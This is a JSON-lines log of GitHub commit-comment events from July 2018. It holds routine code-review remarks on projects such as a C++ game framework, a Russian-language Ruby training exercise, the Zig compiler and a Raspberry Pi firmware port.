{"id":"7935509731","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636673,"position":9,"line":241,"path":"Source/Foundation/bsfCore/Private/RTTI/BsMaterialParamsRTTI.h","commit_id":"f66b81380ac2e0165f4d68abf8db01c7875fd192","created_at":"2018-07-09T05:41:54Z","updated_at":"2018-07-09T05:41:54Z","author_association":"CONTRIBUTOR","body":"\"an\" older serialized version."}},"created_at":"2018-07-09T05:41:54Z"}
{"id":"7935509919","type":"CommitCommentEvent","actor":{"login":"luriel-xyz"},"repo":{"name":"luriel-xyz/Tekfix.github.io"},"payload":{"comment":{"id":29636674,"position":null,"line":null,"path":null,"commit_id":"5db14a90627d2ac6621ed1eb7e4c37a71262c347","created_at":"2018-07-09T05:41:59Z","updated_at":"2018-07-09T05:41:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Login/Sign Up Page](https://trello.com/c/1xOKQzKK/3-login-sign-up-page)"}},"created_at":"2018-07-09T05:41:59Z"}
{"id":"7935510124","type":"CommitCommentEvent","actor":{"login":"BernardoFPereira"},"repo":{"name":"BernardoFPereira/Glitch-Garden"},"payload":{"comment":{"id":29636675,"position":null,"line":null,"path":null,"commit_id":"009a15842f03c5b31ff4e33ebffa7c323185c8cf","created_at":"2018-07-09T05:42:04Z","updated_at":"2018-07-09T05:42:04Z","author_association":"OWNER","body":"Start* screen typo noticed."}},"created_at":"2018-07-09T05:42:04Z"}
{"id":"7935511423","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29636676,"position":null,"line":null,"path":null,"commit_id":"330e848d4a0f8ff867ef8c52901f33b10a4ece63","created_at":"2018-07-09T05:42:32Z","updated_at":"2018-07-09T05:42:32Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/dashboard-warning-when-s3-backups-are-globally-configured/88872/7\n"}},"created_at":"2018-07-09T05:42:32Z"}
{"id":"7935512451","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636677,"position":18,"line":250,"path":"Source/Foundation/bsfCore/Private/RTTI/BsMaterialParamsRTTI.h","commit_id":"f66b81380ac2e0165f4d68abf8db01c7875fd192","created_at":"2018-07-09T05:42:57Z","updated_at":"2018-07-09T05:42:57Z","author_association":"CONTRIBUTOR","body":"does post-fix increment always come out to the same assembly code as prefix increment when used in this kind of context? One of those things i never bothered to actually investigate. I imagine so right?"}},"created_at":"2018-07-09T05:42:57Z"}
{"id":"7935514625","type":"CommitCommentEvent","actor":{"login":"matteosoo"},"repo":{"name":"matteosoo/keras-text-summarization"},"payload":{"comment":{"id":29636679,"position":null,"line":null,"path":null,"commit_id":"b5dfb5632183d6a236510937dad05f693574c302","created_at":"2018-07-09T05:43:47Z","updated_at":"2018-07-09T05:43:47Z","author_association":"OWNER","body":"1.\r\n-r, --requirement Install from the given requirements file. This option can be used multiple times.\r\n2.\r\n-r will search for requirement file."}},"created_at":"2018-07-09T05:43:47Z"}
{"id":"7935515297","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636683,"position":3,"line":2,"path":"Lesson3/station.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:44:01Z","updated_at":"2018-07-09T05:44:01Z","author_association":"NONE","body":"последний ридер не имеет смысла, т.к. ридер, т.е. геттер возвращает значение инстанс переменной, а у тебя нигде не определена переменная `@trains_count`"}},"created_at":"2018-07-09T05:44:01Z"}
{"id":"7935517563","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636688,"position":57,"line":23,"path":"Lesson3/station.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:44:54Z","updated_at":"2018-07-09T05:44:54Z","author_association":"NONE","body":"ненужный метод\r\nсм. комментарии к методу `trains_list_by_type`"}},"created_at":"2018-07-09T05:44:54Z"}
{"id":"7935519415","type":"CommitCommentEvent","actor":{"login":"andreiw"},"repo":{"name":"andreiw/raspberry-pi3-atf"},"payload":{"comment":{"id":29636696,"position":null,"line":null,"path":null,"commit_id":"11c9a950ea89a753e473c8b66d6cfe23e9ce7e42","created_at":"2018-07-09T05:45:37Z","updated_at":"2018-07-09T05:45:37Z","author_association":"OWNER","body":"I wouldn’t hold my breath... The Pi is a doorstop without the VC firmware - any firmware, proprietary or OSS.\n\nA\n\n> On Jul 8, 2018, at 6:41 PM, satmandu <notifications@github.com> wrote:\n> \n> For what it's worth, this change is dependent upon there being an accessible bootcode.bin, since the Pi bootrom loads bootcode.bin into the GPU, which then looks at the value of the RSTS register before powering down and waiting for GPIO wake if RSTS has 0x555 in it.\n> \n> Maybe at some point we'll know what the GPU does when it sees that RSTS value to put the Pi on low power mode so that it can be done directly when we want to shut down or halt.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-09T05:45:37Z"}
{"id":"7935520236","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636697,"position":23,"line":255,"path":"Source/Foundation/bsfCore/Private/RTTI/BsMaterialParamsRTTI.h","commit_id":"f66b81380ac2e0165f4d68abf8db01c7875fd192","created_at":"2018-07-09T05:45:54Z","updated_at":"2018-07-09T05:45:54Z","author_association":"CONTRIBUTOR","body":"I wonder for this kind of situation if allocating an std::array, for the sake of having the helper functions that make it more difficult to make a mistake when using things like memset would be worth it.\r\n\r\nNot saying you're using memset incorrectly here, but I personally almost lean toward allocating a new std::array instead of the raw-array to trade that slightly larger compile time for more robust compile-time syntax for things like fill and such."}},"created_at":"2018-07-09T05:45:54Z"}
{"id":"7935521589","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636702,"position":74,"line":25,"path":"Lesson3/station.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:46:25Z","updated_at":"2018-07-09T05:46:25Z","author_association":"NONE","body":"ТЗ: \"Может возвращать список всех поездов на станции, находящиеся в текущий момент\", что уже реализовано ридером `:trains`\r\nа этот метод \"выводит на печать\", чего не нужно"}},"created_at":"2018-07-09T05:46:25Z"}
{"id":"7935521823","type":"CommitCommentEvent","actor":{"login":"PatrickvL"},"repo":{"name":"mborgerson/xqemu"},"payload":{"comment":{"id":29636703,"position":27,"line":null,"path":"hw/xbox/nv2a/nv2a.c","commit_id":"0523deaa938dd267a17bcc5102a49dd58ebffe79","created_at":"2018-07-09T05:46:30Z","updated_at":"2018-07-09T05:46:30Z","author_association":"NONE","body":"What if there are still retired entries dangling around?"}},"created_at":"2018-07-09T05:46:30Z"}
{"id":"7935523093","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636706,"position":84,"line":32,"path":"Lesson3/station.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:47:00Z","updated_at":"2018-07-09T05:47:00Z","author_association":"NONE","body":"лучше сделать так, чтобы метод  принимал в качестве аргумента тип поезда и возвращал информацию только по этому типу"}},"created_at":"2018-07-09T05:47:00Z"}
{"id":"7935524893","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29636709,"position":null,"line":null,"path":null,"commit_id":"31fb9d994b49ccd9ad3f2f560925e561a73383a5","created_at":"2018-07-09T05:47:43Z","updated_at":"2018-07-09T05:47:43Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-login-re](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-login-re).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-login-re-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T05:47:43Z"}
{"id":"7935527464","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636715,"position":89,"line":37,"path":"Lesson3/station.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:48:44Z","updated_at":"2018-07-09T05:48:44Z","author_association":"NONE","body":"если ты хочешь возвращать число, то тебе не нужен \"селект\"\r\nпосмотри на метод класса `Array`: [Array#count](https://ruby-doc.org/core-2.5.0/Array.html#method-i-count)\r\n"}},"created_at":"2018-07-09T05:48:44Z"}
{"id":"7935529540","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29636717,"position":21,"line":54,"path":"build.gradle","commit_id":"cbcc470a63c0d75d10806405aefc4da7e2754746","created_at":"2018-07-09T05:49:30Z","updated_at":"2018-07-09T05:49:30Z","author_association":"MEMBER","body":"I still think you should move these values out to a gradle.properties. If not to avoid having to gid them out of the build.gradle, you have some duplication across here and the project that makes them hard to edit."}},"created_at":"2018-07-09T05:49:30Z"}
{"id":"7935530214","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29636719,"position":5,"line":3,"path":"build.number","commit_id":"cbcc470a63c0d75d10806405aefc4da7e2754746","created_at":"2018-07-09T05:49:44Z","updated_at":"2018-07-09T05:49:44Z","author_association":"MEMBER","body":"Delet"}},"created_at":"2018-07-09T05:49:44Z"}
{"id":"7935533330","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636722,"position":5,"line":2,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:50:54Z","updated_at":"2018-07-09T05:50:54Z","author_association":"NONE","body":"про синтаксис см. в классе Станция"}},"created_at":"2018-07-09T05:50:54Z"}
{"id":"7935536392","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29636729,"position":null,"line":null,"path":null,"commit_id":"96148a63415517c9edfaeea14e62e1be7dd0f20c","created_at":"2018-07-09T05:52:05Z","updated_at":"2018-07-09T05:52:05Z","author_association":"COLLABORATOR","body":"wow, awesome :) Beside performances gain, maybe there are some hidden treasures in the bullet 3 API :)"}},"created_at":"2018-07-09T05:52:05Z"}
{"id":"7935537895","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636732,"position":24,"line":16,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:52:42Z","updated_at":"2018-07-09T05:52:42Z","author_association":"NONE","body":"еще можно так записать условие `if speed >= value`"}},"created_at":"2018-07-09T05:52:42Z"}
{"id":"7935540334","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636737,"position":44,"line":24,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:53:38Z","updated_at":"2018-07-09T05:53:38Z","author_association":"NONE","body":"возможно даже правильней проверять `vagon_count > 0`"}},"created_at":"2018-07-09T05:53:38Z"}
{"id":"7935540732","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"ziglang/zig"},"payload":{"comment":{"id":29636740,"position":null,"line":null,"path":null,"commit_id":"82e9190d0939a7f71df3d602e381b0ec7cccb561","created_at":"2018-07-09T05:53:47Z","updated_at":"2018-07-09T05:53:47Z","author_association":"MEMBER","body":"By the way, since you're having a look at the self-hosted parsing code, here are some ideas I have for the future:\r\n * Now that we know we can use recursion (because of `@newStackCall` and eventual ability to statically determine stack upper bound and detect call graph cycles), rewrite the self-hosted parser in a more natural recursive way. The render code is already done this way.\r\n * Either switch back to `ArrayList(*Node)` or make ast nodes tagged unions and use `SegmentedList(Node)`. Whichever is faster. With the tagged union strategy, we could set a maximum node size with comptime asserts, and if a node wants to exceed this it would have to have a pointer field `other_fields` with the other stuff allocated separately.\r\n    - `SegmentedList(*Node)` - the current implementation - is kind of pointless because it's an unnecessary double pointer situation. However due to the non-recursive implementation, SegmentedList is handy because it lets you rely on the lifetime of items being permanent whereas ArrayList item pointer lifetimes expire on every `append`. I believe that with normal recursive descent this difference would not matter (we use ArrayList in the stage1 recursive descent parser)."}},"created_at":"2018-07-09T05:53:47Z"}
{"id":"7935542947","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636742,"position":49,"line":281,"path":"Source/Foundation/bsfCore/Private/RTTI/BsMaterialParamsRTTI.h","commit_id":"f66b81380ac2e0165f4d68abf8db01c7875fd192","created_at":"2018-07-09T05:54:38Z","updated_at":"2018-07-09T05:54:38Z","author_association":"CONTRIBUTOR","body":"Are the \"getRTTIName\" functions always compile time strings?\r\n\r\nIf so, then it might be worth it to convert these to returning std::string_view (Not available until c++17, but super trivial to make your own, I can do it for you if you want).\r\n\r\nThat'd save the static initialization of the string object at the first function invocation.\r\n\r\nIt would also allow you to make getRTTIName constexpr, when (if?) this paper gets integrated into the standard: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2018/p1064r0.html\r\n\r\n\r\nRegardless, I'd recommend marking String as const in this situation just for consistency with const variables. Not sure it'll allow the compiler to optimize at all, given someone might const-cast the returned value, but I suppose a compiler might reasonably assume const-is-const in this situation. Could save you a runtime-thread-safe \"static variable\" initialization check (atomic boolean comparison, i think?)"}},"created_at":"2018-07-09T05:54:38Z"}
{"id":"7935547012","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636753,"position":63,"line":37,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:56:10Z","updated_at":"2018-07-09T05:56:10Z","author_association":"NONE","body":"слишком сложно\r\nзачем все эти строки?\r\nздесь должно быть реализовано ровно то, что относится к этому методу из ТЗ:\r\n- Может принимать маршрут следования (объект класса Route). \r\n- При назначении маршрута поезду, поезд автоматически помещается на первую станцию в маршруте.\r\nвсе остальное - лишнее"}},"created_at":"2018-07-09T05:56:10Z"}
{"id":"7935547111","type":"CommitCommentEvent","actor":{"login":"bluepnume"},"repo":{"name":"aze3ma/react-app-rewire-scss"},"payload":{"comment":{"id":29636754,"position":null,"line":null,"path":null,"commit_id":"dea6e33ba6b7cddded9033f3d1d006a67fae5cf7","created_at":"2018-07-09T05:56:12Z","updated_at":"2018-07-09T05:56:12Z","author_association":"NONE","body":"Any chance of a publish for this change? :)"}},"created_at":"2018-07-09T05:56:12Z"}
{"id":"7935547684","type":"CommitCommentEvent","actor":{"login":"13621877812"},"repo":{"name":"13621877812/Pay"},"payload":{"comment":{"id":29636755,"position":1,"line":1,"path":".gitignore","commit_id":"1ea7ba154ca50c4d56ce112d51a2267157c465ce","created_at":"2018-07-09T05:56:26Z","updated_at":"2018-07-09T05:56:26Z","author_association":"OWNER","body":"*.m"}},"created_at":"2018-07-09T05:56:26Z"}
{"id":"7935547861","type":"CommitCommentEvent","actor":{"login":"FelinaeZeng"},"repo":{"name":"FelinaeZeng/ML"},"payload":{"comment":{"id":29636757,"position":null,"line":null,"path":null,"commit_id":"1512726f737d2c6cbf1a3b3eb3a77eb2e5cace38","created_at":"2018-07-09T05:56:30Z","updated_at":"2018-07-09T05:56:30Z","author_association":"OWNER","body":"Model choose"}},"created_at":"2018-07-09T05:56:30Z"}
{"id":"7935547947","type":"CommitCommentEvent","actor":{"login":"ParmarNaresh"},"repo":{"name":"ParmarNaresh/myProjects"},"payload":{"comment":{"id":29636758,"position":null,"line":null,"path":null,"commit_id":"d17bc16212b1198086d82cb5de2fe40271a32d12","created_at":"2018-07-09T05:56:32Z","updated_at":"2018-07-09T05:56:32Z","author_association":"OWNER","body":"this is first commit"}},"created_at":"2018-07-09T05:56:32Z"}
{"id":"7935548560","type":"CommitCommentEvent","actor":{"login":"ParmarNaresh"},"repo":{"name":"ParmarNaresh/myProjects"},"payload":{"comment":{"id":29636760,"position":null,"line":null,"path":null,"commit_id":"d17bc16212b1198086d82cb5de2fe40271a32d12","created_at":"2018-07-09T05:56:46Z","updated_at":"2018-07-09T05:56:46Z","author_association":"OWNER","body":"hello this is other commit"}},"created_at":"2018-07-09T05:56:46Z"}
{"id":"7935549374","type":"CommitCommentEvent","actor":{"login":"dev-harsh1998"},"repo":{"name":"dev-harsh1998/android_device_lenovo_a6000"},"payload":{"comment":{"id":29636761,"position":null,"line":null,"path":null,"commit_id":"9c9bbb00bd6816138c7f266b674540e44b0bc0ee","created_at":"2018-07-09T05:57:07Z","updated_at":"2018-07-09T05:57:07Z","author_association":"OWNER","body":"You clean up plx"}},"created_at":"2018-07-09T05:57:07Z"}
{"id":"7935550393","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636763,"position":59,"line":81,"path":"Source/Foundation/bsfCore/Managers/BsResourceListenerManager.cpp","commit_id":"4f2949221cf57c08da267aeb2ead4cf61ba134b9","created_at":"2018-07-09T05:57:30Z","updated_at":"2018-07-09T05:57:30Z","author_association":"CONTRIBUTOR","body":"Could you use std::move() to steal the listener object from mDirtyListeners ? Not completely certain what the listener object is from just this file, but if it uses rvalue-references, stealing the data before clearing the container would be a net win, i think."}},"created_at":"2018-07-09T05:57:30Z"}
{"id":"7935552636","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636765,"position":69,"line":43,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T05:58:20Z","updated_at":"2018-07-09T05:58:20Z","author_association":"NONE","body":"я не понял зачем этот метод"}},"created_at":"2018-07-09T05:58:20Z"}
{"id":"7935553542","type":"CommitCommentEvent","actor":{"login":"UC-KyeungseokKang"},"repo":{"name":"UC-KyeungseokKang/ML_for_basic"},"payload":{"comment":{"id":29636768,"position":null,"line":null,"path":null,"commit_id":"2c7671215973274f5f1f488ea9806b38cc26720d","created_at":"2018-07-09T05:58:42Z","updated_at":"2018-07-09T05:58:42Z","author_association":"OWNER","body":"model1"}},"created_at":"2018-07-09T05:58:42Z"}
{"id":"7935554488","type":"CommitCommentEvent","actor":{"login":"Sakura831143"},"repo":{"name":"Sakura831143/MyTest"},"payload":{"comment":{"id":29636769,"position":null,"line":null,"path":null,"commit_id":"53647117b45c83229379ab2eb763647ae31df6f4","created_at":"2018-07-09T05:59:07Z","updated_at":"2018-07-09T05:59:07Z","author_association":"OWNER","body":"第一次提交"}},"created_at":"2018-07-09T05:59:07Z"}
{"id":"7935558134","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29636788,"position":59,"line":81,"path":"Source/Foundation/bsfCore/Managers/BsResourceListenerManager.cpp","commit_id":"4f2949221cf57c08da267aeb2ead4cf61ba134b9","created_at":"2018-07-09T06:00:23Z","updated_at":"2018-07-09T06:00:23Z","author_association":"CONTRIBUTOR","body":"Oh. Never mind. Just a vector of pointers. Wouldn't make a difference.\r\n\r\nWould using std::swap make sense? Is mTempListenerBuffer added to prior to this function?\r\n\r\n\r\nAnother approach could be to use std::list, and then use std::list::splice to move the container nodes from one container to another.\r\n\r\nOh well, not sure it's worth bothering with any of that. I made my initial comment above without knowing it was a vector of pointers."}},"created_at":"2018-07-09T06:00:23Z"}
{"id":"7935562366","type":"CommitCommentEvent","actor":{"login":"Zlika"},"repo":{"name":"Zlika/theodore"},"payload":{"comment":{"id":29636795,"position":null,"line":null,"path":null,"commit_id":"def2d143f24e0ad9324f71ed0b2ca93e09722479","created_at":"2018-07-09T06:01:45Z","updated_at":"2018-07-09T06:01:45Z","author_association":"OWNER","body":"It's a problem with gcc stack protector option. I've just removed it from the psp/vita/ps3 architectures, that should fix the problem. However I don't understand why the theodore/ps3 build was ok but only the ra/ps3 build failed."}},"created_at":"2018-07-09T06:01:45Z"}
{"id":"7935563641","type":"CommitCommentEvent","actor":{"login":"somadsul"},"repo":{"name":"Oves786/TWRP--android_device_samsung_j7xelte"},"payload":{"comment":{"id":29636797,"position":null,"line":null,"path":null,"commit_id":"d30f64d15420bed3929a38b8ce5dcb3e9d593b67","created_at":"2018-07-09T06:02:13Z","updated_at":"2018-07-09T06:02:13Z","author_association":"NONE","body":"/dev/s5p-smem This permission you mentioned two times & both are different.\r\n which one is correct?"}},"created_at":"2018-07-09T06:02:13Z"}
{"id":"7935566329","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636800,"position":86,"line":47,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:03:12Z","updated_at":"2018-07-09T06:03:12Z","author_association":"NONE","body":"1. текущая станция будет меняться, когда поезд будет двигаться по маршруту\r\nпочему метод все время ссылается на первую станцию маршрута?\r\n2. если можно написать `@route.stations`, то зачем нужна переменная `@route_stations` ?\r\nнепонятное дублирование"}},"created_at":"2018-07-09T06:03:12Z"}
{"id":"7935569373","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636804,"position":63,"line":37,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:04:20Z","updated_at":"2018-07-09T06:04:20Z","author_association":"NONE","body":"и почитай комменты ниже"}},"created_at":"2018-07-09T06:04:20Z"}
{"id":"7935571207","type":"CommitCommentEvent","actor":{"login":"Bindu18First"},"repo":{"name":"Bindu18First/hello-world"},"payload":{"comment":{"id":29636806,"position":null,"line":null,"path":null,"commit_id":"de241bcdf99be8ff162e54a6359e8b84cd6e2a71","created_at":"2018-07-09T06:05:02Z","updated_at":"2018-07-09T06:05:02Z","author_association":"OWNER","body":"My FIrst try on Repository"}},"created_at":"2018-07-09T06:05:02Z"}
{"id":"7935572460","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636807,"position":89,"line":50,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:05:29Z","updated_at":"2018-07-09T06:05:29Z","author_association":"NONE","body":"правильней будет, если `next_station` будет только метод, т.к. переменная не имеет смысла\r\nзачем тебе переменная `@next_station`, если \"следующую станцию всегда можно вычислить исходя из маршрута и текущей станции?"}},"created_at":"2018-07-09T06:05:29Z"}
{"id":"7935572665","type":"CommitCommentEvent","actor":{"login":"trimpim"},"repo":{"name":"trimpim/genode"},"payload":{"comment":{"id":29636809,"position":null,"line":null,"path":null,"commit_id":"8c72f4e7b7df26a991556734131fee8c1103aa8a","created_at":"2018-07-09T06:05:33Z","updated_at":"2018-07-09T06:05:33Z","author_association":"OWNER","body":"I did not recognize any problems, but I wasn't testing for a very long time or try to find any Issues specifically. \r\nThe reason I added this was to reduce the error messages during startup of acpica. \r\nIf this can cause problem, then it is probably best to not integrate this patch."}},"created_at":"2018-07-09T06:05:33Z"}
{"id":"7935572950","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636810,"position":96,"line":57,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:05:39Z","updated_at":"2018-07-09T06:05:39Z","author_association":"NONE","body":"см. комменты выше"}},"created_at":"2018-07-09T06:05:39Z"}
{"id":"7935580187","type":"CommitCommentEvent","actor":{"login":"Arturiqz"},"repo":{"name":"Arturiqz/Test"},"payload":{"comment":{"id":29636819,"position":null,"line":null,"path":null,"commit_id":"2ba08ecb3bdf4e6014eaeacb298d1f4723f29bbe","created_at":"2018-07-09T06:08:12Z","updated_at":"2018-07-09T06:08:12Z","author_association":"OWNER","body":"why were there some changes?"}},"created_at":"2018-07-09T06:08:12Z"}
{"id":"7935580215","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636821,"position":92,"line":53,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:08:13Z","updated_at":"2018-07-09T06:08:13Z","author_association":"NONE","body":"сложный код\r\nзачем использовать `rotate`, если можно просто и явно обратиться к следующему индексу массива?\r\n"}},"created_at":"2018-07-09T06:08:13Z"}
{"id":"7935583719","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636828,"position":92,"line":53,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:09:31Z","updated_at":"2018-07-09T06:09:31Z","author_association":"NONE","body":"можно просто хранить индекс текущей станции, исходя из него ты всегда можешь найти текущую станцию, следующую и предыдущую\r\nпросто обратившись к массиву по индексу\r\nкод будет явным и простым"}},"created_at":"2018-07-09T06:09:31Z"}
{"id":"7935583883","type":"CommitCommentEvent","actor":{"login":"SeoYoungSun"},"repo":{"name":"SeoYoungSun/NewSkyProject"},"payload":{"comment":{"id":29636829,"position":null,"line":null,"path":null,"commit_id":"aa9423c163d0eecffbf6a54ee01cd00e38ea41ec","created_at":"2018-07-09T06:09:34Z","updated_at":"2018-07-09T06:09:34Z","author_association":"OWNER","body":"UTF-8설정해라 "}},"created_at":"2018-07-09T06:09:34Z"}
{"id":"7935585007","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636831,"position":106,"line":67,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:09:58Z","updated_at":"2018-07-09T06:09:58Z","author_association":"NONE","body":"не понял зачем этот метод"}},"created_at":"2018-07-09T06:09:58Z"}
{"id":"7935586320","type":"CommitCommentEvent","actor":{"login":"kimjeahwa"},"repo":{"name":"tensorflow/hub"},"payload":{"comment":{"id":29636833,"position":null,"line":null,"path":null,"commit_id":"52d5066e925d345fbd54ddf98b7cadf027b69d99","created_at":"2018-07-09T06:10:27Z","updated_at":"2018-07-09T06:10:27Z","author_association":"NONE","body":"aa"}},"created_at":"2018-07-09T06:10:27Z"}
{"id":"7935591213","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636838,"position":118,"line":70,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:12:12Z","updated_at":"2018-07-09T06:12:12Z","author_association":"NONE","body":"странный вызов\r\nв любом случае селф не нужен, но думаю этот вызо уйдет, когда ты исправишь предыдущие комменты"}},"created_at":"2018-07-09T06:12:12Z"}
{"id":"7935598058","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29636847,"position":119,"line":71,"path":"Lesson3/train.rb","commit_id":"6c32f8aa202ef63fd5e4cd8b617129a28781e293","created_at":"2018-07-09T06:14:22Z","updated_at":"2018-07-09T06:14:22Z","author_association":"NONE","body":"здесь правильней был бы код типа: `if current_station == route.last_station`\r\nт.е. во-первых работа с методами\r\nво-вторых метод `last_station` это скорее метод класса Роут, чем класса Поезд (о чем я тебе намекнул в комментарии к классу Роут,  последний комментарий)"}},"created_at":"2018-07-09T06:14:22Z"}
{"id":"7935600359","type":"CommitCommentEvent","actor":{"login":"joelagnel"},"repo":{"name":"joelagnel/androdeb"},"payload":{"comment":{"id":29636849,"position":null,"line":null,"path":null,"commit_id":"087ff8b506bafc826319eff89ef314b7145447ea","created_at":"2018-07-09T06:15:10Z","updated_at":"2018-07-09T06:15:10Z","author_association":"OWNER","body":"@ErickReyesR "}},"created_at":"2018-07-09T06:15:10Z"}
{"id":"7935600578","type":"CommitCommentEvent","actor":{"login":"erikbozic"},"repo":{"name":"erikbozic/tarok-scoreboard"},"payload":{"comment":{"id":29636850,"position":16,"line":55,"path":"src/TarokScoreBoard.Core/TarokRound.cs","commit_id":"2e47922fbf8c533a5c1a0bc35c8e1423d9449343","created_at":"2018-07-09T06:15:13Z","updated_at":"2018-07-09T06:15:13Z","author_association":"OWNER","body":"@erikbozic you already check this..."}},"created_at":"2018-07-09T06:15:13Z"}
